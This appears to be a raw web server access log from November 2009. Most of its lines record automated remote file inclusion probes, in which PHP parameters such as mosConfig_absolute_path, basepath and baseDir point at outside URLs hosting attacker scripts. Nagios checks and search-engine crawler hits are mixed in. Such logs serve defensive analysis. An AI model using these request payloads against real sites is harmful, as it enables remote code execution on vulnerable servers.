93.190.48.203 - - [26/Nov/2009:02:58:42 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.energoss.net/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
93.190.48.203 - - [26/Nov/2009:02:58:42 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.energoss.net/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
93.190.48.203 - - [26/Nov/2009:02:58:42 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.energoss.net/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Nov/2009:02:58:43 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
78.110.50.112 - - [26/Nov/2009:02:59:21 -0500] "GET /logs/error_log.Q109101300%20%20///modules/4nAlbum/public/displayCategory.php?basepath=http://21tv.org/bbs///zfxid1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
78.110.50.112 - - [26/Nov/2009:02:59:22 -0500] "GET ///modules/4nAlbum/public/displayCategory.php?basepath=http://21tv.org/bbs///zfxid1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
78.110.50.112 - - [26/Nov/2009:02:59:22 -0500] "GET /logs///modules/4nAlbum/public/displayCategory.php?basepath=http://21tv.org/bbs///zfxid1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
78.110.50.112 - - [26/Nov/2009:03:00:03 -0500] "GET ///modules/4nAlbum/public/displayCategory.php?basepath=http://21tv.org/bbs///zfxid1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
78.110.50.112 - - [26/Nov/2009:03:00:03 -0500] "GET /logs/error_log.Q109101300%20%20///modules/4nAlbum/public/displayCategory.php?basepath=http://21tv.org/bbs///zfxid1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
78.110.50.112 - - [26/Nov/2009:03:00:03 -0500] "GET /logs///modules/4nAlbum/public/displayCategory.php?basepath=http://21tv.org/bbs///zfxid1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
93.190.48.203 - - [26/Nov/2009:03:01:02 -0500] "GET /logs//pollphp/textfile//admin/common.inc.php?base_path=http://www.energoss.net/id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
93.190.48.203 - - [26/Nov/2009:03:01:02 -0500] "GET //pollphp/textfile//admin/common.inc.php?base_path=http://www.energoss.net/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
93.190.48.203 - - [26/Nov/2009:03:01:02 -0500] "GET //pollphp/textfile//admin/common.inc.php?base_path=http://www.energoss.net/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
93.190.48.203 - - [26/Nov/2009:03:01:02 -0500] "GET /logs//pollphp/textfile//admin/common.inc.php?base_path=http://www.energoss.net/id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
91.121.28.22 - - [26/Nov/2009:03:01:13 -0500] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.esperandoportuamor.com/modules/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
91.121.28.22 - - [26/Nov/2009:03:01:13 -0500] "GET /logs/access_log.Q109082100%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.esperandoportuamor.com/modules/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
91.121.28.22 - - [26/Nov/2009:03:01:13 -0500] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.esperandoportuamor.com/modules/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
195.70.35.48 - - [26/Nov/2009:03:01:39 -0500] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.esperandoportuamor.com/modules/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
195.70.35.48 - - [26/Nov/2009:03:01:39 -0500] "GET /logs/access_log.Q109082100%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.esperandoportuamor.com/modules/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
195.70.35.48 - - [26/Nov/2009:03:01:39 -0500] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.esperandoportuamor.com/modules/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
78.110.50.112 - - [26/Nov/2009:03:02:02 -0500] "GET /logs/access_log.Q109100200%20%20///modules/4nAlbum/public/displayCategory.php?basepath=http://21tv.org/bbs///zfxid1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
78.110.50.112 - - [26/Nov/2009:03:02:24 -0500] "GET /logs/access_log.Q109100200%20%20///modules/4nAlbum/public/displayCategory.php?basepath=http://21tv.org/bbs///zfxid1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
91.121.28.22 - - [26/Nov/2009:03:04:11 -0500] "GET /logs/error_log.Q109101300%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.esperandoportuamor.com/modules/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.195.111.169 - - [26/Nov/2009:03:04:33 -0500] "GET /images/_notes/nav_store_search_icon.jpg.mno HTTP/1.0" 200 247 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.55.143.249 - - [26/Nov/2009:03:05:12 -0500] "GET /logs/access_log.Q109051600//tools/send_reminders.php?noSet=0&includedir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
200.71.237.150 - - [26/Nov/2009:03:05:25 -0500] "GET /logs/error_log.Q109101300///modules/4nAlbum/public/displayCategory.php?basepath=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 268 "-" "libwww-perl/5.813"
200.71.237.150 - - [26/Nov/2009:03:05:26 -0500] "GET ///modules/4nAlbum/public/displayCategory.php?basepath=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.813"
200.71.237.150 - - [26/Nov/2009:03:05:26 -0500] "GET /logs///modules/4nAlbum/public/displayCategory.php?basepath=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.813"
195.70.35.48 - - [26/Nov/2009:03:05:30 -0500] "GET /logs/error_log.Q109101300%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.esperandoportuamor.com/modules/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Nov/2009:03:05:32 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.55.143.249 - - [26/Nov/2009:03:06:00 -0500] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
72.55.143.249 - - [26/Nov/2009:03:06:00 -0500] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
72.55.143.249 - - [26/Nov/2009:03:06:00 -0500] "GET /logs/access_log.Q109060500//tools/send_reminders.php?noSet=0&includedir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
91.121.28.22 - - [26/Nov/2009:03:07:02 -0500] "GET /logs/access_log.Q109082100//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.esperandoportuamor.com/modules/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
195.70.35.48 - - [26/Nov/2009:03:07:04 -0500] "GET /logs/access_log.Q109082100//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.esperandoportuamor.com/modules/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.38.15.75 - - [26/Nov/2009:03:07:43 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo!php?baseDir=http://www.botnik.net/krise/img/mspc/pid.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
218.38.15.75 - - [26/Nov/2009:03:07:43 -0500] "GET /logs/access_log.Q109110600//components/com_joomlalib/standalone/stubjambo!php?baseDir=http://www.botnik.net/krise/img/mspc/pid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
218.38.15.75 - - [26/Nov/2009:03:07:43 -0500] "GET //components/com_joomlalib/standalone/stubjambo!php?baseDir=http://www.botnik.net/krise/img/mspc/pid.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
91.121.28.22 - - [26/Nov/2009:03:07:57 -0500] "GET /logs/error_log.Q109101300//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.esperandoportuamor.com/modules/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:03:08:02 -0500] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:03:08:02 -0500] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
72.55.143.249 - - [26/Nov/2009:03:08:05 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
72.55.143.249 - - [26/Nov/2009:03:08:05 -0500] "GET /logs/access_log.Q109051200%20%20//appserv/main.php?appserv_root=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
72.55.143.249 - - [26/Nov/2009:03:08:05 -0500] "GET //appserv/main.php?appserv_root=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
72.55.143.249 - - [26/Nov/2009:03:08:10 -0500] "GET //appserv/main.php?appserv_root=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
72.55.143.249 - - [26/Nov/2009:03:08:10 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
72.55.143.249 - - [26/Nov/2009:03:08:10 -0500] "GET /logs/access_log.Q109051200%20%20//appserv/main.php?appserv_root=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
218.38.15.75 - - [26/Nov/2009:03:08:13 -0500] "GET /logs/access_log.Q109081500//components/com_joomlalib/standalone/stubjambo!php?baseDir=http://www.botnik.net/krise/img/mspc/pid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:03:08:20 -0500] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:03:08:20 -0500] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
195.70.35.48 - - [26/Nov/2009:03:08:40 -0500] "GET /logs/error_log.Q109101300//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.esperandoportuamor.com/modules/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.38.15.75 - - [26/Nov/2009:03:08:45 -0500] "GET //components/com_joomlalib/standalone/stubjambo!php?baseDir=http://www.botnik.net/krise/img/mspc/pid.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
218.38.15.75 - - [26/Nov/2009:03:08:45 -0500] "GET /logs/access_log.Q109081500%20%20//components/com_joomlalib/standalone/stubjambo!php?baseDir=http://www.botnik.net/krise/img/mspc/pid.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
218.38.15.75 - - [26/Nov/2009:03:08:45 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo!php?baseDir=http://www.botnik.net/krise/img/mspc/pid.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
190.95.231.98 - - [26/Nov/2009:03:09:37 -0500] "GET /logs/error_log.Q109061600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
190.95.231.98 - - [26/Nov/2009:03:09:45 -0500] "GET /logs/error_log.Q109092200//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
190.95.231.98 - - [26/Nov/2009:03:10:29 -0500] "GET /logs/access_log.Q109092200//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Nov/2009:03:10:34 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.38.15.75 - - [26/Nov/2009:03:10:40 -0500] "GET /logs/access_log.Q109082100%20%20//components/com_joomlalib/standalone/stubjambo!php?baseDir=http://www.botnik.net/krise/img/mspc/pid.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
78.110.50.112 - - [26/Nov/2009:03:10:49 -0500] "GET /logs/error_log.Q109101300///modules/4nAlbum/public/displayCategory.php?basepath=http://21tv.org/bbs///zfxid1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
61.110.22.144 - - [26/Nov/2009:03:11:01 -0500] "GET /logs/access_log.Q109082000%20%20/main.php?pagina=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.110.22.144 - - [26/Nov/2009:03:11:01 -0500] "GET /logs/main.php?pagina=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
61.110.22.144 - - [26/Nov/2009:03:11:01 -0500] "GET /main.php?pagina=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
61.110.22.144 - - [26/Nov/2009:03:11:12 -0500] "GET /main.php?pagina=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
61.110.22.144 - - [26/Nov/2009:03:11:12 -0500] "GET /logs/main.php?pagina=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
61.110.22.144 - - [26/Nov/2009:03:11:13 -0500] "GET /logs/access_log.Q109082000%20%20/main.php?pagina=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
78.110.50.112 - - [26/Nov/2009:03:11:54 -0500] "GET /logs/error_log.Q109101300///modules/4nAlbum/public/displayCategory.php?basepath=http://21tv.org/bbs///zfxid1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
78.110.50.112 - - [26/Nov/2009:03:11:54 -0500] "GET /logs/access_log.Q109100200///modules/4nAlbum/public/displayCategory.php?basepath=http://21tv.org/bbs///zfxid1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
61.110.22.144 - - [26/Nov/2009:03:12:06 -0500] "GET /logs/error_log.Q109081300%20%20/main.php?pagina=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
61.110.22.144 - - [26/Nov/2009:03:12:11 -0500] "GET /logs/error_log.Q109081300%20%20/main.php?pagina=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
78.110.50.112 - - [26/Nov/2009:03:12:50 -0500] "GET /logs/access_log.Q109100200///modules/4nAlbum/public/displayCategory.php?basepath=http://21tv.org/bbs///zfxid1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
218.38.15.75 - - [26/Nov/2009:03:13:30 -0500] "GET //components/com_joomlalib/standalone/stubjambo!php?baseDir=http://www.botnik.net/krise/img/mspc/pid.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
218.38.15.75 - - [26/Nov/2009:03:13:30 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo!php?baseDir=http://www.botnik.net/krise/img/mspc/pid.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
218.38.15.75 - - [26/Nov/2009:03:13:30 -0500] "GET /logs/access_log.Q109110600//components/com_joomlalib/standalone/stubjambo!php?baseDir=http://www.botnik.net/krise/img/mspc/pid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
200.71.237.150 - - [26/Nov/2009:03:14:03 -0500] "GET ///modules/4nAlbum/public/displayCategory.php?basepath=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.813"
91.121.28.22 - - [26/Nov/2009:03:14:10 -0500] "GET /logs/error_log.Q109061900//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.esperandoportuamor.com/modules/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Nov/2009:03:15:33 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
195.70.35.48 - - [26/Nov/2009:03:16:16 -0500] "GET /logs/error_log.Q109061900//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.esperandoportuamor.com/modules/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
72.55.143.249 - - [26/Nov/2009:03:17:06 -0500] "GET /logs/access_log.Q109051600//tools/send_reminders.php?noSet=0&includedir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
151.12.58.89 - - [26/Nov/2009:03:17:21 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://209.250.240.98/~f2f/idv6.txt??? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
151.12.58.89 - - [26/Nov/2009:03:17:21 -0500] "GET /logs/access_log.Q109051500//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://209.250.240.98/~f2f/idv6.txt??? HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
151.12.58.89 - - [26/Nov/2009:03:17:22 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://209.250.240.98/~f2f/idv6.txt??? HTTP/1.1" 404 279 "-" "libwww-perl/5.805"
220.181.7.94 - - [26/Nov/2009:03:18:21 -0500] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
118.107.162.36 - - [26/Nov/2009:03:18:24 -0500] "GET /modules/My_eGallery/index.php?basepath=http://21tv.org/bbs///zfxid1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
118.107.162.36 - - [26/Nov/2009:03:18:24 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://21tv.org/bbs///zfxid1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
118.107.162.36 - - [26/Nov/2009:03:18:24 -0500] "GET /logs/access_log.Q109050800%20%20/modules/My_eGallery/index.php?basepath=http://21tv.org/bbs///zfxid1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
41.250.251.52 - - [26/Nov/2009:03:18:29 -0500] "GET /logs/access_log.Q109060500//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
64.150.177.236 - - [26/Nov/2009:03:19:11 -0500] "GET /logs/access_log.Q109102900//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://209.250.240.98/~f2f/idv6.txt??? HTTP/1.1" 404 277 "-" "libwww-perl/5.805"
64.150.177.236 - - [26/Nov/2009:03:19:11 -0500] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://209.250.240.98/~f2f/idv6.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
64.150.177.236 - - [26/Nov/2009:03:19:12 -0500] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://209.250.240.98/~f2f/idv6.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
67.195.114.54 - - [26/Nov/2009:03:19:48 -0500] "GET /scripts/browser_ee.js HTTP/1.0" 200 10423 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
216.139.67.116 - - [26/Nov/2009:03:19:57 -0500] "GET /logs/access_log.Q109110600//dotproject//includes/db_connect.php?baseDir=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:03:19:57 -0500] "GET /logs//dotproject//includes/db_connect.php?baseDir=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:03:19:57 -0500] "GET //dotproject//includes/db_connect.php?baseDir=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
64.150.177.236 - - [26/Nov/2009:03:20:13 -0500] "GET /logs/access_log.Q109110600//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://209.250.240.98/~f2f/idv6.txt??? HTTP/1.1" 404 277 "-" "libwww-perl/5.805"
209.59.12.99 - - [26/Nov/2009:03:20:33 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.139.67.116 - - [26/Nov/2009:03:20:47 -0500] "GET //dotproject//includes/db_connect.php?baseDir=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:03:20:48 -0500] "GET /logs//dotproject//includes/db_connect.php?baseDir=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:03:20:48 -0500] "GET //dotproject//includes/db_connect.php?baseDir=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:03:20:48 -0500] "GET /logs/access_log.Q109110600%20%20//dotproject//includes/db_connect.php?baseDir=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:03:20:48 -0500] "GET /logs//dotproject//includes/db_connect.php?baseDir=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:03:20:50 -0500] "GET /logs/access_log.Q109110600%20%20//dotproject//includes/db_connect.php?baseDir=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:03:21:01 -0500] "GET //dotproject//includes/db_connect.php?baseDir=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:03:21:01 -0500] "GET /logs//dotproject//includes/db_connect.php?baseDir=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:03:21:01 -0500] "GET /logs/access_log.Q109110600//dotproject//includes/db_connect.php?baseDir=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:03:21:10 -0500] "GET /logs//dotproject//includes/db_connect.php?baseDir=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:03:21:10 -0500] "GET /logs/access_log.Q109110600//dotproject//includes/db_connect.php?baseDir=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:03:21:10 -0500] "GET //dotproject//includes/db_connect.php?baseDir=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:03:21:21 -0500] "GET //dotproject//includes/db_connect.php?baseDir=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:03:21:21 -0500] "GET /logs//dotproject//includes/db_connect.php?baseDir=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:03:21:21 -0500] "GET /logs/access_log.Q109110600//dotproject//includes/db_connect.php?baseDir=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
151.12.58.89 - - [26/Nov/2009:03:21:36 -0500] "GET /logs/error_log.Q109110100//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://209.250.240.98/~f2f/idv6.txt??? HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
118.107.162.36 - - [26/Nov/2009:03:21:41 -0500] "GET /logs/error_log.Q109101800%20%20/modules/My_eGallery/index.php?basepath=http://21tv.org/bbs///zfxid1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
95.110.225.160 - - [26/Nov/2009:03:22:19 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://ubuntu123.fileave.com/test.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
95.110.225.160 - - [26/Nov/2009:03:22:20 -0500] "GET //include/bbs.lib.inc.php?site_path=http://ubuntu123.fileave.com/test.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
67.195.114.54 - - [26/Nov/2009:03:21:58 -0500] "GET /logs/access_log.Q109092400 HTTP/1.0" 200 7812198 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
123.125.66.71 - - [26/Nov/2009:03:25:19 -0500] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
84.22.133.229 - - [26/Nov/2009:03:25:25 -0500] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.vnmhost.net/01.gif?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
84.22.133.229 - - [26/Nov/2009:03:25:25 -0500] "GET /logs/access_log.Q109051500//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.vnmhost.net/01.gif?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
